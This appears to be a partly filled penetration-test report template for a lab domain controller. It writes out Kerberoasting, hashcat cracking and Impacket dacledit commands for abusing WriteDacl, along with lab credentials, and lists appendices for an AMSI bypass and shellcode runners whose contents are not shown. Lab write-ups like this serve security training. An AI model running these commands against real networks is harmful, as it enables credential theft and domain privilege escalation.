Detailed Findings and Recommendations
The scope of this penetration test is to identify, exploit and report the results of
of penetration test performed on following set of IP addresses.
| ID | IPs | Name | DC |
|---|
| Machine 1 | 10.10.124.219 | BREACHDC.BREACH.VL | |
Enumeration
8. Internal Recon
Ntlm theft by uploading files on SMB share
julia.wong
Computer1
cme ldap ip.txt -u julia.wong -p Computer1 --kerberoasting KERBEROASTING
hashcat hashes_kerberoasting /usr/share/wordlists/rockyou.txt
svc_mssql
Trustno1
Modifying the rights
To abuse WriteDacl to a group object, you may grant yourself the AddMember privilege.
Impacket’s dacledit can be used for that purpose (cf. “grant rights” reference for the link).
dacledit.py -action 'write' -rights 'WriteMembers' -principal 'controlledUser' -target-dn 'groupDistinguidedName' 'domain'/'controlledUser':'password'
Additional Items
Appendix - AMSI Bypass code
Appendix - Powershell Shellcoderunner
Appendix - ANOTHER_SHELLCODE_USED Shellcoderunner Code
Appendix - Risk Assessment Matrix
Appendix - Proof and Local Contents
| Hostname | local.txt Contents | proof.txt Contents |
|---|
| HOSTNAME | foo | bar |
| HOSTNAME | foo | bar |
Appendix - Credentials obtained
NTLM Hashes
| Username | NTLM Hash | Found in |
|---|
| Administrator | HASH | HOSTNAME |
Passwords
| Found in | Corresponds to | Password |
|---|
| HOSTNAME | USER BELONGS | Password123* |
Credential’s files
| Found in | File | Type |
|---|
| HOSTNAME | FILE FROM WHERE IS IT | Example: SSH Priv. Key |